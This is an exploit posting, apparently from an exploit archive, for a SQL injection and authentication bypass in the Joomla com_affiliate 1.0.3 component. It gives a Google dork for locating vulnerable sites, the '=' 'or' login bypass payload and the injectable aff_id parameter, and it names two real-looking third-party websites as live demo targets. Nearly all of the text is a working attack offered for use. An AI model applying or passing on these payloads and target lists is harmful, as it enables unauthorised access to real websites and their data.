Joomla Affiliate 1.0.3 SQL Injection
Posted on 14 June 2016
###################### # Exploit Title : Joomla com_affiliate - SQL Injection # Exploit Author : Persian Hack Team # Google Dork : inurl:index.php?option=com_affiliate # Category: [ Webapps ] # Tested on: [ Win ] # Version: 1.0.3 # Date: 2016/06/13 ###################### # # PoC: # --Bypass Authentication # http://www.site.com/index.php?option=com_affiliate&view=login # UserName And Password '=' 'or' # --SQL Injection # http://www.site.com/index.php?aff_id=1 # aff_id Parameter Vulnerable To SQL # Demo : # http://www.danieledewinter.com/it/programma-affiliati/login # http://www.azarshahd.com/en/index.php?option=com_affiliate&view=login # # Youtube : https://www.youtube.com/watch?v=bUMjwC5_IYM ###################### # Discovered by : Mojtaba MobhaM # Greetz : T3NZOG4N & FireKernel & Milad Hacking & JOK3R & Muhmmad Emad And All Persian Hack Team Members # Homepage : persian-team.ir ######################